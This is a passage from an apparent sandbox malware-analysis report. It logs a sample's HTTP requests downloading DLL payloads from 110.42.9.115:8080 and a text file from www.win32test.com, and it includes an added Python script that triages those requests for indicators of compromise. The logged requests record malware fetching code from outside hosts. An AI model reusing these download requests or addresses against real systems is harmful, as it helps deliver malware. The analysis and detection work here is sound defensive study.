Of the UDP traffic above, only the DNS queries to 114.114.114.114 (a public resolver in China, configured for the analysis VM) can plausibly be tied to the sample; the NetBIOS broadcasts (137/138), NTP to time.windows.com, LLMNR to 224.0.0.252:5355 and SSDP to 239.255.255.250:1900 are ordinary Windows background traffic and should not be read as sample behaviour.

HTTP & HTTPS Requests

Two different User-Agent strings appear below. The DLL fetches from 110.42.9.115:8080 all carry a fixed "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" string that does not describe the analysis host, while the pro.txt request to www.win32test.com:8080 sends an IE9 / Windows NT 6.1 string with gbk and GB2312 Accept-Encoding, so two separate HTTP code paths are in use. The DLL fetches are also resumed with "Range: bytes=N-" from increasing offsets over "Connection: close" sessions, consistent with the 20 short-lived connections to port 8080 in the TCP table.

URI Data
http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=24576-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1146470-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1719705-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=73728-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/dc.dll
GET /1/dc.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=49152-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://www.win32test.com:8080/4/pro.txt
GET /4/pro.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.win32test.com:8080

http://110.42.9.115:8080/1/gzip.dll
GET /1/gzip.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=25804-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/ewe.dll
GET /1/ewe.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=2292940-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

http://110.42.9.115:8080/1/socket.dll
GET /1/socket.dll HTTP/1.1
Host: 110.42.9.115:8080
Accept: */*
Referer: http://110.42.9.115:8080/1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=881868-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
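The request list above is the kind of artefact a triage script can score directly. The script below is an added example, not code from the report or the sandbox: it parses raw HTTP requests, groups them by URI, and flags a bare-IP Host header (no DNS lookup, matching the "no DNS query" indicator), a pre-IE7 User-Agent, an executable file extension, and resumed downloads via non-zero Range offsets. The sample requests are constructed from the ones shown above (three resumed fetches of dc.dll, a full and a resumed fetch of ewe.dll, and the pro.txt request); the legacy-UA regex and extension list are assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Assumption: a pre-IE7 User-Agent on a modern host is a hard-coded downloader string.
LEGACY_UA = re.compile(r"MSIE [1-6]\.")
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".ocx")  # assumption: extensions worth flagging


def parse_request(raw: str) -> Dict:
    """Split a raw request into method, path and a lower-cased header dict."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def host_is_bare_ip(host: str) -> bool:
    """True for 'Host: 1.2.3.4' or '1.2.3.4:8080' (IPv4 only; bracketed IPv6 is not handled)."""
    try:
        ipaddress.IPv4Address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def range_start(headers: Dict) -> Optional[int]:
    """Offset of an open-ended 'Range: bytes=N-' header, or None."""
    m = re.fullmatch(r"bytes=(\d+)-", headers.get("range", ""))
    return int(m.group(1)) if m else None


def triage(raw_requests: List[str]) -> Dict[str, Dict]:
    """Per-URI summary: fetch count, Range offsets, User-Agents seen and flags."""
    per_uri = defaultdict(lambda: {"count": 0, "ranges": [], "user_agents": set(), "flags": set()})
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        ua = req["headers"].get("user-agent", "")
        rec = per_uri[f"http://{host}{req['path']}"]
        rec["count"] += 1
        rec["user_agents"].add(ua)
        if host_is_bare_ip(host):
            rec["flags"].add("direct-ip-host")          # contacted by IP, so no DNS lookup
        if LEGACY_UA.search(ua):
            rec["flags"].add("legacy-user-agent")
        if req["path"].lower().endswith(EXECUTABLE_EXT):
            rec["flags"].add("executable-extension")
        start = range_start(req["headers"])
        if start is not None:
            rec["ranges"].append(start)
            if start > 0:
                rec["flags"].add("resumed-download")    # partial GET from a non-zero offset
    return dict(per_uri)


def _req(path: str, host: str, ua: str, extra: str = "") -> str:
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\nAccept: */*\r\nUser-Agent: {ua}\r\n"
            f"{extra}Pragma: no-cache\r\nCache-Control: no-cache\r\nConnection: close\r\n")


OLD_UA = "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
IE9_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
C2 = "110.42.9.115:8080"

# Constructed from the requests in the report.
SAMPLE_REQUESTS = [
    _req("/1/dc.dll", C2, OLD_UA, "Range: bytes=24576-\r\n"),
    _req("/1/dc.dll", C2, OLD_UA, "Range: bytes=73728-\r\n"),
    _req("/1/dc.dll", C2, OLD_UA, "Range: bytes=49152-\r\n"),
    _req("/1/ewe.dll", C2, OLD_UA),
    _req("/1/ewe.dll", C2, OLD_UA, "Range: bytes=1146470-\r\n"),
    _req("/4/pro.txt", "www.win32test.com:8080", IE9_UA),
]


if __name__ == "__main__":
    for uri, rec in sorted(triage(SAMPLE_REQUESTS).items()):
        print(f"{uri}\n  fetched {rec['count']}x ranges={sorted(rec['ranges'])} flags={sorted(rec['flags'])}")
```

The Range offsets are kept in request order rather than sorted so that an out-of-order resume (73728 before 49152 above) stays visible; on a real capture that ordering is what distinguishes a parallel chunked downloader from a client retrying a dropped connection.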

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.